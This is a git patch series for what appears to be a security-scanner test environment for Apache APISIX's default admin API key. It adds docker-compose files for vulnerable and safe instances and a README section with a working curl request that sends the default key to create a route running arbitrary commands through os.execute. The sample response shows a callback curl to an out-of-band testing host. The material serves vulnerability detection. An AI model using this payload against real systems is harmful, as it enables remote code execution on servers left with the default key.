From 6143c36717bae46246aca52a3f4fffbcb2de8af7 Mon Sep 17 00:00:00 2001 From: Robert Dick Date: Thu, 7 May 2026 08:52:34 -0400 Subject: [PATCH 1/3] unified docker compose and clarified readme --- apache/apisix/defaultapitoken/README.md | 6 +++--- .../docker-compose-non-vulnerable.yml | 17 ----------------- .../apisix/defaultapitoken/docker-compose.yml | 19 +++++++++++++++---- 3 files changed, 18 insertions(+), 24 deletions(-) delete mode 100644 apache/apisix/defaultapitoken/docker-compose-non-vulnerable.yml diff --git a/apache/apisix/defaultapitoken/README.md b/apache/apisix/defaultapitoken/README.md index 8e1dcfbd..ccfcaac6 100644 --- a/apache/apisix/defaultapitoken/README.md +++ b/apache/apisix/defaultapitoken/README.md @@ -3,8 +3,8 @@ This directory contains the deployment configs for an Apache APISIX installation Apache APISIX has a built-in default API KEY. If the user does not proactively modify it (which few will), Lua scripts -can be executed directly through the API interface, which can lead to RCE vulnerabilities. +can be executed directly through the API interface, which can lead to RCE vulnerabilities. Normally, the admin API endpoints are restricted by the client IP address, but this tests for a case where other IP addresses have been allowed. See the `allow_admin` part of the configuration files. -You can start the vulnerable service by running the command `docker compose up -d`. The deployed container has name `apache-apisix-defaul-api-token` and listens on port `9080`. +You can start both the vulnerable service and safe service by running the command `docker compose up -d`. The vulnerable container listens on port `8081`, and the safe container listens on port `8082`. -The container that is not affected by the vulnerability is `apache-apisix-defaul-api-token-safe`, you can start it with `docker compose -f docker-compose-safe.yml up -d`, and the service listens on port `9081`. +In this case, the vulnerable service uses APISIX with the default API key, and the safe service uses APISIX with a changed API key using the `config_api_key_change.yml` file. diff --git a/apache/apisix/defaultapitoken/docker-compose-non-vulnerable.yml b/apache/apisix/defaultapitoken/docker-compose-non-vulnerable.yml deleted file mode 100644 index 005fbdb5..00000000 --- a/apache/apisix/defaultapitoken/docker-compose-non-vulnerable.yml +++ /dev/null @@ -1,17 +0,0 @@ -services: - apache-apisix-defaul-api-token-safe: - image: apache/apisix:2.11.0-alpine - restart: unless-stopped - ports: - - "9081:9080" - volumes: - - ./config_api_key_change.yml:/usr/local/apisix/conf/config.yaml:ro - depends_on: - - etcd - etcd: - image: bitnami/etcd:3.4.15 - environment: - ETCD_ENABLE_V2: "true" - ALLOW_NONE_AUTHENTICATION: "yes" - ETCD_ADVERTISE_CLIENT_URLS: "http://0.0.0.0:2379" - ETCD_LISTEN_CLIENT_URLS: "http://0.0.0.0:2379" diff --git a/apache/apisix/defaultapitoken/docker-compose.yml b/apache/apisix/defaultapitoken/docker-compose.yml index 981ea86f..64fdc14e 100644 --- a/apache/apisix/defaultapitoken/docker-compose.yml +++ b/apache/apisix/defaultapitoken/docker-compose.yml @@ -1,15 +1,26 @@ services: - apache-apisix-defaul-api-token: - image: apache/apisix:2.11.0-alpine + apache-apisix-default-api-token: + image: apache/apisix:2.13.0-alpine + platform: linux/amd64 restart: unless-stopped ports: - - "9080:9080" + - "8081:9080" volumes: - ./config_default.yml:/usr/local/apisix/conf/config.yaml:ro depends_on: - etcd + apache-apisix-default-api-token-safe: + image: apache/apisix:2.13.0-alpine + platform: linux/amd64 + restart: unless-stopped + ports: + - "8082:9080" + volumes: + - ./config_api_key_change.yml:/usr/local/apisix/conf/config.yaml:ro + depends_on: + - etcd etcd: - image: bitnami/etcd:3.4.15 + image: bitnamilegacy/etcd:3.4.15 environment: ETCD_ENABLE_V2: "true" ALLOW_NONE_AUTHENTICATION: "yes" From dd21595db0176a33acd0328e3f10eae4bfbcb634 Mon Sep 17 00:00:00 2001 From: Robert Dick Date: Thu, 11 Jun 2026 08:47:59 -0400 Subject: [PATCH 2/3] improved reliability --- .../apisix/defaultapitoken/docker-compose.yml | 48 +++++++++++++++++-- 1 file changed, 44 insertions(+), 4 deletions(-) diff --git a/apache/apisix/defaultapitoken/docker-compose.yml b/apache/apisix/defaultapitoken/docker-compose.yml index 64fdc14e..f558b4e9 100644 --- a/apache/apisix/defaultapitoken/docker-compose.yml +++ b/apache/apisix/defaultapitoken/docker-compose.yml @@ -1,5 +1,5 @@ services: - apache-apisix-default-api-token: + apache-apisix-default-api-token-vuln: image: apache/apisix:2.13.0-alpine platform: linux/amd64 restart: unless-stopped @@ -8,7 +8,12 @@ services: volumes: - ./config_default.yml:/usr/local/apisix/conf/config.yaml:ro depends_on: - - etcd + etcd-vuln: + condition: service_healthy + networks: + vuln: + aliases: + - apisix apache-apisix-default-api-token-safe: image: apache/apisix:2.13.0-alpine platform: linux/amd64 @@ -18,11 +23,46 @@ services: volumes: - ./config_api_key_change.yml:/usr/local/apisix/conf/config.yaml:ro depends_on: - - etcd - etcd: + etcd-safe: + condition: service_healthy + networks: + safe: + aliases: + - apisix + etcd-vuln: image: bitnamilegacy/etcd:3.4.15 environment: ETCD_ENABLE_V2: "true" ALLOW_NONE_AUTHENTICATION: "yes" ETCD_ADVERTISE_CLIENT_URLS: "http://0.0.0.0:2379" ETCD_LISTEN_CLIENT_URLS: "http://0.0.0.0:2379" + healthcheck: + test: ["CMD", "curl", "-sf", "http://localhost:2379/health"] + interval: 5s + timeout: 3s + retries: 10 + networks: + vuln: + aliases: + - etcd + etcd-safe: + image: bitnamilegacy/etcd:3.4.15 + environment: + ETCD_ENABLE_V2: "true" + ALLOW_NONE_AUTHENTICATION: "yes" + ETCD_ADVERTISE_CLIENT_URLS: "http://0.0.0.0:2379" + ETCD_LISTEN_CLIENT_URLS: "http://0.0.0.0:2379" + healthcheck: + test: ["CMD", "curl", "-sf", "http://localhost:2379/health"] + interval: 5s + timeout: 3s + retries: 10 + networks: + safe: + aliases: + - etcd +networks: + safe: + driver: bridge + vuln: + driver: bridge \ No newline at end of file From c7ac44d80c198fb8cbaf3aac49678541964d9173 Mon Sep 17 00:00:00 2001 From: Robert Dick Date: Thu, 11 Jun 2026 12:34:22 -0400 Subject: [PATCH 3/3] added curl command --- apache/apisix/defaultapitoken/README.md | 28 +++++++++++++++++++++++++ 1 file changed, 28 insertions(+) diff --git a/apache/apisix/defaultapitoken/README.md b/apache/apisix/defaultapitoken/README.md index ccfcaac6..fe22cd10 100644 --- a/apache/apisix/defaultapitoken/README.md +++ b/apache/apisix/defaultapitoken/README.md @@ -8,3 +8,31 @@ can be executed directly through the API interface, which can lead to RCE vulner You can start both the vulnerable service and safe service by running the command `docker compose up -d`. The vulnerable container listens on port `8081`, and the safe container listens on port `8082`. In this case, the vulnerable service uses APISIX with the default API key, and the safe service uses APISIX with a changed API key using the `config_api_key_change.yml` file. + +## Testing the vulnerability + +Run the following command, replacing `YOUR_COMMAND_HERE` with the command you want to execute (this won't be executed from this curl command alone, you need to execute the route too): +``` +curl -X PUT "http://localhost:8081/apisix/admin/routes/tsunami_rce?ttl=30" \ + -H "X-API-KEY: edd1c9f034335f136f87ad84b625c8f1" \ + -H "Content-Type: application/json" \ + -d '{ + "uri": "/test/anything", + "upstream": { + "type": "roundrobin", + "nodes": {} + }, + "name": "anything", + "filter_func": "function(vars) return os.execute(\"YOUR_COMMAND_HERE\")==true end" + }' +``` + +Vulnerable Response: +``` +{"action":"set","lease_id":"7587895458205140304","node":{"value":{"update_time":1781195535,"filter_func":"function(vars) return os.execute(\"curl 132ovru87ms15vti1jl0vw77gymparyg.burpserver.doyentesting.com\")==true end","priority":0,"id":"tsunami_rce","name":"anything","create_time":1781195535,"uri":"\/test\/anything","status":1,"upstream":{"scheme":"http","type":"roundrobin","hash_on":"vars","pass_host":"pass","nodes":{}}},"key":"\/apisix\/routes\/tsunami_rce"}} +``` + +Safe Response: +``` +{"error_msg":"failed to check token"} +```